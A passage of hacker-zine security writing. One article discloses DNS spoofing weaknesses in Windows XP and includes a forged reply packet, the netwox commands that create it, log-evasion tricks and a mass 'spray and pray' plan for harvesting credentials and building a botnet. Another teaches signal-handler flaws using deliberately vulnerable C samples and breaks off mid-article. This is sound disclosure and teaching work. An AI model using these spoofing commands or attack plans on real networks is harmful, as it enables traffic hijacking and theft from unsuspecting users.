+|=---------------------=[ L I N E N O I S E ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+
+1 - Mistakes in the RFC Guidelines on DNS Spoofing Attacks
+2 - Injecting Signals by Shaun
+3 - Pirating A Radio Station
+
+
+|=------=[ The Impact of RFC Guidelines on DNS Spoofing Attacks ]=------=|
+           by have2Banonymous
+
+
+--[ Contents
+
+
+1 - Executive Summary
+2 - Overview of Basic DNS Spoofing Attacks
+3 - Proposed Criteria for DNS Reply Acceptance
+4 - Impact of RFC Guidelines on DNS Reply Acceptance Criteria
+5 - Example DNS Spoofing Attack
+6 - Practical Impact of RFC Guidelines on DNS Spoofing Attacks
+7 - Implementation Comparison
+8 - Conclusion
+
+
+--[ 1 - Executive Summary
+
+
+This article provides a brief overview of basic Domain Name System (DNS) 
+spoofing attacks against DNS client resolvers.  Technical challenges are 
+proposed that should help to both identify attempted attacks and prevent 
+them from being successful.  Relevant Request for Comments (RFC) 
+guidelines, used by programmers to help ensure their DNS resolver code 
+meets specifications, are reviewed.  This results in the realisation that 
+the RFC guidelines are not adequately specific or forceful to help 
+identify or prevent DNS spoofing attacks against DNS client resolvers.  
+Furthermore, the RFC guidelines actually simplify such attacks to a level 
+that has not previously been discussed in the public domain until now.
+
+To highlight the consequences of merely conforming to the RFC guidelines 
+without considering security ramifications, an example DNS spoofing attack 
+against the DNS resolver in Microsoft Windows XP is provided.  This 
+illustrates serious weaknesses in the Windows XP DNS resolver client 
+implementation.  For example, Windows XP will accept a DNS reply as being 
+valid without performing a thorough check that the DNS reply actually 
+matches the DNS request.  This allows an attacker to create malicious 
+generic DNS replies that only need to meet a couple of criteria with 
+predictable values in order to be accepted as a valid DNS reply by the 
+targeted user.
+
+This article discusses the practical impact of the issues raised, such as 
+the ability to perform a successful and reasonably undetectable DNS 
+spoofing attack against a large target base of Windows XP users, without 
+the attacker requiring knowledge of the DNS requests issued by the 
+targeted users.  Finally, a comparison with the DNS resolver in Debian 
+Linux is supplied.
+
+
+
+--[ 2 - Overview of Basic DNS Spoofing Attacks
+
+
+When a user types the web site name www.somewebsite.org into their web 
+browser, their computer issues a DNS request to their Internet Service 
+Provider's (ISP) DNS server to resolve the web site name to an IP address. 
+An attacker may attempt to subvert this process by sending the user a DNS 
+reply containing an incorrect IP address, resulting in the user's computer 
+connecting to a computer of the attacker's choice instead of the desired 
+web site.
+
+
+
+--[ 3 - Proposed Criteria for DNS Reply Acceptance
+
+
+RFC 2535 (Domain Name System Security Extensions) otherwise known as 
+DNSSEC discusses how cryptographic digital signatures can be used to 
+authenticate DNS transactions to help mitigate DNS spoofing attacks.  
+However, the adoption of this technology has been extremely slow.  Even 
+without this level of security, it would initially appear that a DNS 
+spoofing attack against a DNS client resolver would be challenging to 
+perform.  This challenge results from the following proposed criteria of 
+the DNS reply that must be met for it to be accepted by the computer 
+performing the DNS lookup.
+
+Proposed criteria of a DNS reply for it to be accepted:
+
+1) The source IP address must match the IP address that the DNS request 
+was sent to.
+
+2) The destination IP address must match the IP address that the DNS 
+request was sent from.
+
+3) The source port number must match the port number that the DNS request 
+was sent to.
+
+4) The destination port number must match the port number that the DNS 
+request was sent from.
+
+5) The UDP checksum must be correctly calculated.  This may require the 
+attacker to spend more time and effort per attack, although some packet 
+generation utilities have the ability to automatically calculate this 
+value.
+
+6) The transaction ID must match the transaction ID in the DNS request.
+
+7) The domain name in the question section must match the domain name in 
+the question section of the DNS request.
+
+8) The domain name in the answer section must match the domain name in the 
+question section of the DNS request.
+
+9) The requesting computer must receive the attacker's DNS reply before it 
+receives the legitimate DNS reply.
+
+
+
+--[ 4 - Impact of RFC Guidelines on DNS Reply Acceptance Criteria
+
+
+According to the RFC guidelines, it is not necessary for all of these 
+criteria to be met in order for a DNS reply to be accepted.  Specifically, 
+criteria 1, 2, 3, 5, 7 and 8 do not have to be met, while criteria 4, 6 
+and 9 must be met.  The following is a devil's advocate interpretation of 
+the RFC guidelines and a detailed discussion of their effect on each 
+criteria.
+
+Criteria 1 (source IP address) does not have to be met according to RFC 
+791 (Internet Protocol) which states that "In general, an implementation 
+must be conservative in its sending behavior, and liberal in its receiving 
+behavior.  That is, it must be careful to send well-formed datagrams, but 
+must accept any datagram that it can interpret (e.g., not object to 
+technical errors where the meaning is still clear)".  RFC 1035 (Domain 
+names - implementation and specification) states that "Some name servers 
+send their responses from different addresses than the one used to receive 
+the query.  That is, a resolver cannot rely that a response will come from 
+the same address which it sent the corresponding query to".  The source IP 
+address can therefore be set to an arbitrary IP address.  Regardless, if 
+desired, the attacker can set the source IP address of their DNS replies 
+to that of the targeted user's DNS server.  This is especially easy if the 
+targeted user is a dialup ISP user since the ISP may have a friendly "How 
+to setup your Internet connection" web page that specifies the IP address 
+of their DNS server.
+
+Criteria 2 (destination IP address) does not have to be met according to 
+RFC 1122 (Requirements for Internet Hosts -- Communication Layers) which 
+states that "For most purposes, a datagram addressed to a broadcast or 
+multicast destination is processed as if it had been addressed to one of 
+the host's IP addresses".  Using a broadcast destination address would be 
+most useful for attacking computers on a Local Area Network.  Furthermore, 
+a DNS reply may be accepted if it is addressed to any of the IP addresses 
+associated with a network interface.
+
+Criteria 3 (source port number) does not have to be met according to RFC 
+768 (User Datagram Protocol) which states that "Source Port is an optional 
+field".  The source port can therefore be set to an arbitrary value such 
+as 0 or 12345.  Since the source port number of the DNS reply affects 
+packet dissection by utilities such as Ethereal, a value of 137 is a 
+devious choice since it will be dissected as the NetBIOS Name Service 
+(NBNS) protocol which is based on DNS.  As a result, the malicious DNS 
+replies can be made to appear like NetBIOS traffic which is likely to be 
+discarded by the system administrator or investigator as typical NetBIOS 
+background noise.
+
+Criteria 4 (destination port number) must be met according to RFC 768 
+(User Datagram Protocol).  However, this value may be predictable 
+depending on the requesting computer's operating system.  During testing, 
+Windows XP always used port number 1026 to perform DNS queries, though 
+this value depends on when the DNS Client service started during the boot 
+process.
+
+Criteria 5 (UDP checksum) does not have to be met according to RFC 1122 
+(Requirements for Internet Hosts -- Communication Layers) which states 
+that "the UDP checksum is optional; the value zero is transmitted in the 
+checksum field of a UDP header to indicate the absence of a checksum".
+
+Criteria 6 (transaction ID) must be met according to RFC 1035 (Domain 
+names - implementation and specification) which states that the 
+transaction ID is used "to match up replies to outstanding queries".  
+However, this value may be predictable depending on the requesting 
+computer's operating system.  During testing, Windows XP did not randomly 
+choose the 16 bit transaction ID value.  Rather, Windows XP always used a 
+transaction ID of 1 for the first DNS query performed after the computer 
+was turned on, with the transaction ID simply incremented for subsequent 
+DNS queries.  Transaction ID 1 and 2 were used by the operating system to 
+perform a DNS query of time.windows.com.
+
+Criteria 7 and 8 (domain name in question and answer section) do not have 
+to be met according to RFC 1035 (Domain names - implementation and 
+specification) which states that the transaction ID is used "to match up 
+replies to outstanding queries" and recommends as a secondary step "to 
+verify that the question section corresponds to the information currently 
+desired".  RFC recommendations do not have to be followed, and in the case 
+of an absent question section, the principal that an implementation must 
+accept any datagram that it can interpret appears to apply.  Therefore, a 
+DNS reply containing a single answer in the form of an IP address can be 
+matched to the corresponding DNS request based on the transaction ID, 
+without requiring a question section and without resorting to the overhead 
+of processing the domain information in the answer section.  Furthermore, 
+an answer section is not even necessary if an Authority section is 
+provided to refer the requesting computer to an authoritative name server 
+(or a DNS server under the attacker's control).
+
+Criteria 9 (requesting computer must receive the attacker's DNS reply 
+before it receives the legitimate DNS reply) must be met and remains as 
+the greatest challenge to the attacker.  This restriction is difficult 
+to bypass unless the legitimate DNS server is taken out of action to 
+prevent competition with the spoofed DNS reply, or numerous spoofed DNS 
+replies are sent to the targeted user.  However, as discussed above, 
+criteria 1 to 8 either do not have to be met or may have predictable 
+values.  Therefore an attacker may require no knowledge of the victim's 
+DNS request to have a reasonable chance of performing a successful attack 
+by sending the requesting computer a small number of generic DNS replies.  
+Furthermore, there is a viable workaround to the restrictive nature of 
+this criteria.  If the attacker is not trying to compromise a specific 
+computer, a "spray and pray" approach can be used.  This approach involves 
+sending a very small number (twenty) of spoofed DNS replies to a maximum 
+number of potential target computers, instead of trying to compromise a 
+specific user and only once they have been compromised then trying to 
+compromise another specific user.  This "spray and pray" approach won't 
+compromise every potential victim, and every packet the attacker sends 
+won't result in a compromise, but enough of the attacker's malicious DNS 
+replies will be accepted by enough potential victims to make the exercise 
+worthwhile.
+
+
+
+--[ 5 - Example DNS Spoofing Attack
+
+
+A DNS spoofing attack using the concepts discussed in this article was 
+performed against a Windows XP computer.  The test Windows XP computer 
+was a default install of the operating system followed by the application 
+of Service Pack 1.  The Microsoft Internet Connection Firewall shipped 
+with Windows XP was then enabled, and configured to perform full logging 
+of dropped packets and successful connections.
+
+The Windows XP user typed the web site URL www.somewebsite.org into 
+Internet Explorer, resulting in a DNS request being sent from the user's 
+computer (IP address 192.168.1.1) to the user's DNS server (IP address 
+192.168.1.254).
+
+A spoofed DNS reply disguised as NetBIOS data was sent to the user from 
+the fake (spoofed) nonexistent IP address 10.10.10.1, specifying that 
+whatever name the user was attempting to resolve had the IP address 
+192.168.1.77.  The IP address 192.168.1.77 was actually a web server 
+under the attacker's control.
+
+Internet Explorer connected to 192.168.1.77 and requested the web page.  
+This revealed that the designers of the DNS resolver in Microsoft Windows 
+XP also interpreted the RFC guidelines as described in the previous 
+section, significantly simplifying DNS spoofing attacks.
+
+The following network packet decoded by Ethereal version 0.10.3 
+illustrates the malicious DNS reply and demonstrates how Ethereal can be 
+confused into decoding the packet as NetBIOS traffic.
+
+Frame 1 (102 bytes on wire, 102 bytes captured)
+Ethernet II, Src: 00:50:56:c0:00:01, Dst: 00:0c:29:04:7d:25
+Internet Protocol, Src Addr: 10.10.10.1 (10.10.10.1), Dst Addr: 
+192.168.1.1 (192.168.1.1)
+User Datagram Protocol, Src Port: 137 (137), Dst Port: 1026 (1026)
+    Source port: 137 (137)
+    Destination port: 1026 (1026)
+    Length: 68
+    Checksum: 0x0000 (none)
+NetBIOS Name Service
+    Transaction ID: 0x0003
+    Flags: 0x8580 (Name query response, No error)
+    Questions: 0
+    Answer RRs: 1
+    Authority RRs: 0
+    Additional RRs: 0
+    Answers
+        WORKGROUP<1b>: type unknown, class inet
+            Name: WORKGROUP<1b>
+            Type: unknown
+            Class: inet
+            Time to live: 1 day
+            Data length: 4
+            Data
+
+0000  00 0c 29 04 7d 25 00 50 56 c0 00 01 08 00 45 00   ..).}%.PV.....E.
+0010  00 58 bf 58 00 00 00 11 25 89 0a 0a 0a 01 c0 a8   .X.X....%.......
+0020  01 01 00 89 04 02 00 44 00 00 00 03 85 80 00 00   .......D........
+0030  00 01 00 00 00 00 20 46 48 45 50 46 43 45 4c 45   ...... FHEPFCELE
+0040  48 46 43 45 50 46 46 46 41 43 41 43 41 43 41 43   HFCEPFFFACACACAC
+0050  41 43 41 43 41 42 4c 00 00 01 00 01 00 01 51 80   ACACABL.......Q.
+0060  00 04 c0 a8 01 4d                                 .....M
+
+
+This packet was created using the following parameters passed to the 
+freely available netwox packet creation utility:
+
+netwox 38 --ip4-src 10.10.10.1 --ip4-dst 192.168.1.1 --ip4-protocol 17 
+--ip4-data 008904020044000000038580000000010000000020464845504643454c45484
+643455046464641434143414341434143414341424c0000010001000151800004c0a8014d
+
+Alternatively, the following parameters could be used since netwox 
+automatically calculates the UDP checksum:
+
+netwox 39 --ip4-src 10.10.10.1 --ip4-dst 192.168.1.1 --udp-src 137 
+--udp-dst 1026 --udp-data 00038580000000010000000020464845504643454c45484
+643455046464641434143414341434143414341424c0000010001000151800004c0a8014d
+
+The following shows that the spoofed DNS reply has been added to the 
+user's DNS resolver cache for a period of 1 day, causing future 
+resolutions of www.somewebsite.org to map to the web server under the 
+attacker's control.  The cache duration value can be decreased by the 
+attacker so that the entry is either not cached or is immediately removed 
+from the cache in order to remove evidence of the attack.
+
+C:\>ipconfig /displaydns
+
+Windows IP Configuration
+
+         1.0.0.127.in-addr.arpa
+         ----------------------------------------
+         Record Name . . . . . : 1.0.0.127.in-addr.arpa.
+         Record Type . . . . . : 12
+         Time To Live  . . . . : 604393
+         Data Length . . . . . : 4
+         Section . . . . . . . : Answer
+         PTR Record  . . . . . : localhost
+
+
+         www.somewebsite.org
+         ----------------------------------------
+         Record Name . . . . . : FHEPFCELEHFCEPFFFACACACACACACABL
+         Record Type . . . . . : 1
+         Time To Live  . . . . : 86364
+         Data Length . . . . . : 4
+         Section . . . . . . . : Answer
+         A (Host) Record . . . : 192.168.1.77
+
+
+         localhost
+         ----------------------------------------
+         Record Name . . . . . : localhost
+         Record Type . . . . . : 1
+         Time To Live  . . . . : 604393
+         Data Length . . . . . : 4
+         Section . . . . . . . : Answer
+         A (Host) Record . . . : 127.0.0.1
+
+
+The following log file from Microsoft's Internet Connection Firewall 
+reveals that it did not provide any protection against the attack, though 
+it is not designed to inspect and correlate DNS traffic.  If the firewall 
+was not configured to log successful connections, then there would not 
+have been any log entries.
+
+#Verson: 1.0
+#Software: Microsoft Internet Connection Firewall
+#Time Format: Local
+#Fields: date time action protocol src-ip dst-ip src-port dst-port size 
+tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info
+
+2004-05-10 20:34:56 OPEN UDP 192.168.1.1 192.168.1.254 1026 53 - - - - - - 
+- -
+2004-05-10 20:34:57 OPEN-INBOUND UDP 10.10.10.1 192.168.1.1 137 1026 - - - 
+- - - - -
+2004-05-10 20:34:57 OPEN TCP 192.168.1.1 192.168.1.77 3010 80 - - - - - - 
+- -
+2004-05-10 20:35:30 CLOSE TCP 192.168.1.1 192.168.1.77 3010 80 - - - - - - 
+- -
+2004-05-10 20:36:30 CLOSE UDP 192.168.1.1 192.168.1.254 1026 53 - - - - - 
+- - -
+2004-05-10 20:36:30 CLOSE UDP 10.10.10.1 192.168.1.1 137 1026 - - - - - - 
+- -
+
+It can be seen that when the Windows XP computer sent a UDP packet from 
+port 1026 to port 53 of the DNS server, the firewall allowed all incoming 
+UDP traffic to port 1026, regardless of the source IP address or source 
+port of the incoming traffic.  Such incoming traffic was allowed to 
+continue until the firewall decided to block access to port 1026, which 
+occurred when there was no incoming traffic to port 1026 for a defined 
+period of time.  This timeframe was between 61 seconds and 120 seconds, as 
+it appeared that the firewall checked once per minute to determine if 
+access to ports should be revoked due to more than 60 seconds of 
+inactivity.  Assuming that users connected to the Internet would typically 
+perform a DNS query at least every minute, incoming access to port 1026 
+would always be granted.  An attacker on the Internet could therefore send 
+the Windows XP computer spoofed DNS replies without worrying that they 
+might be blocked by the firewall.  Such traffic would not generate any 
+logs if the firewall was configured to only Log Dropped Packets.  If the 
+firewall was configured to also Log Successful Connections as in this 
+example, these log entries would disappear among the thousands of other 
+log entries.  Since the firewall logs connections and not traffic, if the 
+source IP address was set to the Windows XP computer's DNS server, no 
+extra firewall log entries would be created as a result of the DNS 
+spoofing attack.
+
+The netstat command revealed that the Windows XP computer was always 
+listening on UDP port 1026, and as a result, extra DNS replies were 
+silently discarded and did not generate an error message in the event log 
+or an ICMP port unreachable packet.  This behaviour, and the reuse of the 
+same source port number for DNS requests, was attributed to the DNS Client 
+service.
+
+
+
+--[ 6 - Practical Impact of RFC Guidelines on DNS Spoofing Attacks
+
+
+The attacker does not require information about the targeted user's DNS 
+requests, such as the IP address of the user's DNS server, the source port 
+of the user's DNS request, or the name that the user was attempting to 
+resolve to an IP address.  Therefore the attacker does not require access 
+to the communication link between the targeted user and their DNS server.
+
+Windows XP SP1 matches DNS replies to DNS requests by only the transaction 
+ID and the UDP port number, and both of these values are very predictable. 
+Since the name to be resolved is not matched between the DNS request and 
+the DNS reply, the attacker does not care what domain name the user 
+queried since this domain name does not have to be placed in the 
+attacker's DNS reply.  As a result, the attacker can create generic 
+malicious DNS replies that will successfully subvert the targeted user's 
+DNS lookup process regardless of the name the targeted user was attempting 
+to resolve, and regardless of the targeted user's network configuration 
+such as the IP address of their DNS server.
+
+An attacker desiring to compromise as many computers as possible with the 
+least amount of effort and in the shortest timeframe could send twenty DNS 
+replies that look similar to the generic DNS reply used in the example 
+attack on Windows XP in this article, though with the transaction ID 
+ranging from 3 to 22.  To be more thorough, the attacker could instead 
+send one hundred DNS replies with the destination port number ranging from 
+1025 to 1029.  The attacker would use a "spray and pray" approach by 
+sending these DNS replies to every IP address in the IP address range 
+belonging to a large dialup Internet Service Provider, and when finished, 
+repeating the process.  
+
+A level of success is guaranteed in such an attack scenario considering 
+the huge target base of potential victims awaiting a DNS reply, and 
+considering that Windows XP accepts anything vaguely resembling a DNS 
+reply as a valid DNS reply.
+
+A recipient of the attacker's twenty DNS replies will accept one of them 
+as being valid, resulting in a successful attack, if the recipient:
+- is using Windows XP with its poorly implemented DNS client resolver 
+  (most dialup Internet users are in this category).
+- recently connected to the Internet within the last 10-20 minutes or so 
+  and therefore haven't performed more than twenty DNS requests (a 
+  reasonable proportion of dialup Internet users are in this category).
+- recently performed a DNS request and is awaiting a DNS reply (a 
+  reasonable number of the huge target base of dialup Internet users are 
+  in this category).
+
+The targeted Windows XP users would be unlikely to notice the attack, 
+especially if they were relying on Microsoft Internet Connection Firewall 
+to protect them.  Analysis of the logs of a more sophisticated firewall 
+and inspection of network traffic would not readily reveal a DNS spoofing 
+attack since the source IP address would not be that of the legitimate DNS 
+server.  Furthermore, the source port number and content of the spoofed 
+DNS replies can be crafted to make them appear to be typical NetBIOS 
+background noise which would probably be discarded by the user as useless 
+network traffic floating around the Internet.  Finally, the targeted IP 
+address range of a dialup ISP would consist mainly of home Internet users 
+who are not educated in advanced network security concepts.
+
+The IP address in the spoofed DNS replies could be a computer on the 
+Internet under the attacker's control, which is running proxy software for 
+email (SMTP and POP3) and HTTP traffic.  The attacker would be able to 
+collect sensitive information including email sent and received as well as 
+passwords for future email retrieval.  Web based email and unencrypted 
+login details to web sites would also be collected.  The attacker could 
+add content to HTML pages before returning them to the user.  Such content 
+could include banner ads to generate money, or a hidden frame with a link 
+to a file on a third party web site effectively causing a distributed 
+denial of service attack against the third party.  More seriously, the 
+attacker could increase the scope of the compromise by adding HTML content 
+that exploited one of the publicly known vulnerabilities in Internet 
+Explorer that allows the execution of arbitrary code, but for which there 
+is no vendor patch.  For example, vulnerabilities discussed at the web 
+site http://www.computerworld.com.au/index.php?id=117316298&eid=-255
+The "spray and pray" attack approach is useful for creating a network of 
+semi-randomly chosen compromised computers under the attacker's control, 
+otherwise known as a botnet.
+
+Proxying of HTTP/1.1 traffic could be performed by inspecting the HOST 
+header to determine which web site the user wanted to visit.  However, for 
+the purpose of easily and seamlessly proxying traffic, an attacker may 
+decide not to place an Answer section in the spoofed DNS replies.  Rather, 
+the attacker may send a non-authoritative spoofed DNS reply using the 
+Authority and Additional sections of DNS replies to refer the requesting 
+computer to a DNS server under the attacker's control.  This would allow 
+the attacker to know exactly what domain the victim computer was 
+attempting to query, and furthermore such spoofed DNS replies may have a 
+long lasting and widespread effect on the victim's computer.  A detailed 
+discussion of DNS referrals and testing whether Windows XP could handle 
+them is outside the scope of this article.
+
+
+
+--[ 7 - Implementation Comparison
+
+
+Contributors to the Linux operating system appear to have taken a hardline 
+security conscious approach to interpreting the RFC guidelines, bordering 
+on non-conformance for the sake of security.  The Mozilla web browser 
+running on the author's Debian Linux computer was very restrictive and 
+required DNS replies to meet all of the above nine criteria except for 
+criteria 5, where a UDP checksum value of zero was accepted.  An incorrect 
+UDP checksum was accepted when the packet was sent over a local network 
+but not when sent over the Internet.  Reviewing the kernel source code 
+indicated that for local networks, the UDP checksum was deliberately 
+ignored and hardware based checking was performed instead for performance 
+reasons.  This appeared to be a feature and not a bug, even though it did 
+not comply with RFC 1122 (Requirements for Internet Hosts -- Communication 
+Layers) which states that "If a UDP datagram is received with a checksum 
+that is non-zero and invalid, UDP MUST silently discard the datagram".
+
+During testing, the Linux computer used source port numbers 32768 and 
+32769 to perform DNS queries.  The transaction ID was randomly generated, 
+complicating DNS spoofing attacks, though the transaction ID used in the 
+retransmission of an unanswered DNS request was not as random.  The choice 
+of transaction ID values appeared robust enough to help defend against DNS 
+spoofing attacks on the Internet since the initial transaction ID value 
+was unpredictable, and the first DNS request would typically be answered 
+resulting in no need for retransmissions.
+
+The iptables firewall on the Linux computer was configured so that the 
+only allowed UDP traffic was to/from port 53 of the legitimate DNS server. 
+When a DNS query was performed and a DNS reply was received, iptables was 
+unable to block extra (spoofed) incoming DNS replies since it is not 
+designed to inspect DNS traffic and allow one incoming DNS reply per 
+outgoing DNS request.  However, since the port used to send the DNS query 
+was closed once a valid DNS reply was received, ICMP port unreachable 
+messages were generated for the extra (spoofed) incoming DNS replies.  
+iptables was configured to block and log outgoing ICMP network traffic.  
+Reviewing the logs revealed ICMP port unreachable messages that were 
+destined to the legitimate DNS server, which were a good indication of a 
+DNS spoofing attack.  Further to this evidence of a DNS spoofing attack, 
+since the DNS replies must come from port 53, analysis of the network 
+traffic using a packet dissector such as Ethereal revealed traffic that 
+looked like DNS replies apparently originating at the legitimate DNS 
+server.
+
+
+
+--[ 8 - Conclusion
+
+
+The RFC guidelines simplify DNS spoofing attacks against DNS client 
+resolvers since the attacker does not require information such as the IP 
+address of the potential victim's DNS server or the contents of DNS 
+queries sent by the potential victim.  Microsoft Windows XP is more 
+susceptible to DNS spoofing attacks than Linux due to its poor 
+implementation of the RFC guidelines.  Further simplifying DNS spoofing 
+attacks are Windows XP's inadequate matching of DNS requests to DNS 
+replies, and the predictable port number and transaction ID values - 
+behaviour that could be changed without violating the RFC guidelines.  
+Evidence of DNS spoofing attacks is minimised by the ability to disguise 
+DNS replies as NetBIOS traffic, the lack of configuration granularity and 
+traffic inspection of some firewalls, and Windows XP's failure to generate 
+ICMP error messages for excessive DNS replies.
+
+RFC 791 (Internet Protocol) stating that a program must be "liberal in its 
+receiving behavior" and "must accept any datagram that it can interpret" 
+may have been acceptable in 1981 when the RFC was created and 
+interoperability was more important than security.  However, the Internet 
+has changed from a somewhat trustworthy user base of representatives from 
+educational institutions and the US Department of Defense to now include 
+hackers and scammers, making security a high profile consideration.  
+Perhaps it is time for software based on this outdated perception of the 
+Internet to be changed as well.
+
+The Internet community continues to wait for widespread adoption of 
+cryptographic digital signatures used to authenticate DNS transactions, 
+as discussed in RFC 2535 (Domain Name System Security Extensions).  In the 
+meantime, the threat of DNS spoofing attacks could be minimised by 
+Microsoft improving the DNS implementation in all of their affected 
+operating systems.  Such improvements include using random transaction ID 
+values, checking that the name in a DNS reply matches the name to be 
+resolved in the DNS request, and using a random source port for DNS 
+requests.  These improvements would make attacks against DNS client 
+resolvers significantly more difficult to perform, and such improvements 
+would not violate the RFC guidelines.
+
+
+
+|=----------------------------------------------------------------------=|
+|=----------------------------------------------------------------------=|
+                  
+########################################
+# Injecting signals for Fun and Profit #
+########################################
+
+by shaun2k2 <shaunige@yahoo.co.uk>
+
+
+--[ 1 - Introduction
+
+More secure programming is on the rise, eliminating more generic program
+exploitation vectors, such as stack-based overflows, heap overflows and symlink
+bugs.  Despite this, subtle vulnerabilities are often overlooked during code
+audits, leaving so-called "secure" applications vulnerable to attack, but in a
+less obvious manner.  Secure design of signal-handlers is often not considered,
+but I believe that this class of security holes deserves just as much attention
+as more generic classes of bugs, such as buffer overflow bugs.
+
+This paper intends to discuss problems faced when writing signal-handling
+routines, how to exploit the problems, and presents ideas of how to avoid such
+issues.  A working knowledge of the C programming language and UNIX-like
+operating systems would benefit the reader greatly, but is certainly not
+essential.
+
+
+--[ 2 - Signal Handling: An Overview
+
+To understand what signal handlers are, one must first know what exactly a
+signal is.  In brief, signals are notifications delivered to a process to alert
+the given process about "important" events concerning itself.  For example,
+users of an application can send signals using common keyboard Ctrl
+combinations, such as Ctrl-C - which will send a SIGINT signal to the given
+process.
+
+Many different signals exist, but some of the more common (or useful) ones are:
+SIGINT, SIGHUP, SIGKILL, SIGABRT, SIGTERM and SIGPIPE. Many more exist,
+however.  A list of available signals, according to the POSIX.1 standard,
+can be found in the unix manual page signal(7).
+
+It is worth noting that the signals SIGKILL and
+SIGSTOP cannot be handled, ignored or blocked. Their 'action' can
+not be changed. 
+
+"What are signal handlers", one might ask. The simple answer is that signal
+handlers are small routines which are typically called when a pre-defined
+signal, or set of signals, is delivered to the process it is running under
+before the end of program execution - after execution flow has been directed to
+a signal handling function, all instructions within the handler are executed in
+turn.  In larger applications, however, signal handling routines are often
+written to complete a more complex set of tasks to ensure clean termination of
+the program, such as; unlinking of tempory files, freeing of memory buffers,
+appending log messages, and freeing file descriptors and/or sockets.  Signal
+handlers are generally defined as ordinary program functions, and are then
+defined as the default handler for a certain signal usually near to the
+beginning of the program.
+
+Consider the sample program below:
+
+--- sigint.c ---
+#include <stdio.h>
+#include <signal.h>
+
+void sighndlr() {
+        printf("Ctrl-C caught!\n");
+        exit(0);
+}
+
+int main() {
+        signal(SIGINT, sighndlr);
+
+        while(1)
+                sleep(1);
+
+
+        /* should never reach here */
+        return(0);
+}
+--- EOF ---
+
+'sigint.c' specifies that the function 'sighndlr' should be given control of
+execution flow when a SIGINT signal is received by the program.  The program
+sleeps "forever", or until a SIGINT signal is received - in which case the
+"Ctrl-C caught!" message is printed to the terminal - as seen below:
+
+--- output ---
+[root@localhost shaun]# gcc test.c -o test
+[root@localhost shaun]# ./test
+[... program sleeps ...]
+Ctrl-C caught!
+[root@localhost shaun]#
+--- EOF ---
+
+
+Generally speaking, a SIGINT signal is delivered when a user hits the Ctrl-C
+combination at the keyboard, but a SIGINT signal can be generated by the
+kill(1) utility.
+
+However simple or complex the signal handler is, there are several potential
+pitfalls which must be avoided during the development of the handler. Although 
+a signal handler may look "safe", problems may still arise, but may be 
+less-obvious to the unsuspecting eye. There are two main classes of problems
+when dealing with signal-handler development - non-atomic process
+modifications, and non-reentrant code, both of which are potentially critical
+to system security.
+
+
+--[ 3 - Non-atomic Modifications
+
+Since signals can be delivered at almost any moment, and privileges often need 
+to be maintained (i.e root privileges in a SUID root application) for obvious 
+reasons (i.e for access to raw sockets, graphical resources, etc), signal 
+handling routines need to be written with extra care. If they are not, and 
+special privileges are held by the process at the particular time of signal 
+delivery, things could begin to go wrong very quickly. What is meant by 
+'non-atomic' is that the change in the program isn't permanant - it will
+just be in place temporarily.  To illustrate this, we will discuss a sample
+vulnerable program.
+
+Consider the following sample program:
+
+--- atomicvuln.c ---
+#include <stdio.h>
+#include <signal.h>
+
+void sighndlr() {
+        printf("Ctrl-C caught!\n");
+        printf("UID: %d\n", getuid());
+        /* other cleanup code... */
+}
+
+int showuid() {
+        printf("UID: %d\n", getuid());
+        return(0);
+}
+
+
+int main() {
+        int origuid = getuid();
+        signal(SIGINT, sighndlr);
+
+
+        setuid(0);
+        sleep(5);
+
+        setuid(origuid);
+
+        showuid();
+        return(0);
+}
+--- EOF ---
+
+The above program should immediately spark up any security concious
+programmer's paranoia, but the insecurity isn't immediately obvious
+to everyone.  As we can see from above, a signal handler is declared for
+'SIGINT', and the program gives itself root privileges (so to speak). After
+a delay of around five seconds, the privileges are revoked, and the
+program is exited with success.  However, if a SIGINT signal is received,
+execution is directed to the SIGINT handler, 'sighdlr()'.
+
+Let's look at some sample outputs:
+
+--- output ---
+[root@localhost shaun]# gcc test.c -o test
+[root@localhost shaun]# chmod +s test
+[root@localhost shaun]# exit
+exit
+[shaun@localhost shaun]$ ./test
+[... program sleeps 5 seconds ...]
+UID: 502
+[shaun@localhost shaun]$ ./test
+[... CTRL-C is typed ...]
+Ctrl-C caught!
+UID: 0
+UID: 502
+[shaun@localhost shaun]$
+--- EOF ---
+
+If you hadn't spotted the insecurity in 'atomicvuln.c' yet, the above output 
+should make things obvious; since the signal handling routine, 'sighdlr()', was 
+called when root privileges were still possessed, the friendly printf() 
+statements kindly tell us that our privileges are root (assuming the binary is 
+SUID root).  And just to prove our theory, if we simply allow the program to 
+sleep for 5 seconds without sending an interrupt, the printf() statement kindly 
+tells us that our UID is 502 - my actual UID - as seen above.
+
+With this, it is easy to understand where the flaw lies; if program execution 
+can be interrupted between the time when superuser privileges are given,
+and the time when superuser privileges are revoked, the signal handling
+code *will* be ran with root privileges.  Just imagine - if the signal
+handling routine included potentially sensitive code, compromisation of
+root privileges could occur.
+
+Although the sample program isn't an example of privilege escalation, it at 
+least demonstrates how non-atomic modifications can present security issues
+when signal handling is involved.  And do not assume that code similar to the
+sample program above isn't found in popular security critical applications in 
+wide-spread use - it is.  An example of vulnerable code similar to that of
+above which is an application in wide-spread use, see [1] in the bibliography.
+
+
+Non-reentrant Code
+###################
+
+Although it may not be obvious (and it's not), some glibc functions just
+weren't designed to be reentered due to receipt of a signal, thus causing
+potential problems for signal handlers which use them.  An example of such a
+function is the 'free()' function.  According to 'free()'s man page, free()
+
+"frees the memory space pointed to by ptr, which must have  been
+ returned by a previous call to malloc(), calloc() or realloc().  Other-
+ wise, or  if  free(ptr)  has  already  been  called before,  undefined
+ behaviour occurs.  If ptr is NULL, no operation is performed."
+
+As the man page snippet claims, free() can only be used to release memory which
+was allocated using 'malloc()', else "undefined behavior" occurs.  More 
+specifically, or in usual cases, the heap is corrupted, if free() is called on
+a memory area which has already been free()d.  Because of this implementation 
+design, reentrant signal routines which use 'free()' can be attacked.
+
+Consider the below sample vulnerable program:
+
+--- reentry.c ---
+#include <stdio.h>
+#include <signal.h>
+#include <syslog.h>
+#include <string.h>
+#include <stdlib.h>
+
+void *data1, *data2;
+char *logdata;
+
+void sighdlr() {
+        printf("Entered sighdlr()...\n");
+        syslog(LOG_NOTICE,"%s\n", logdata);
+        free(data2);
+        free(data1);
+        sleep(10);
+        exit(0);
+}
+
+int main(int argc, char *argv[]) {
+          logdata = argv[1];
+          data1 = strdup(argv[2]);
+          data2 = malloc(340);
+          signal(SIGHUP, sighdlr);
+          signal(SIGTERM, sighdlr);
+          sleep(10);
+
+          /* should never reach here */
+          return(0);
+
+}
+--- EOF ---
+
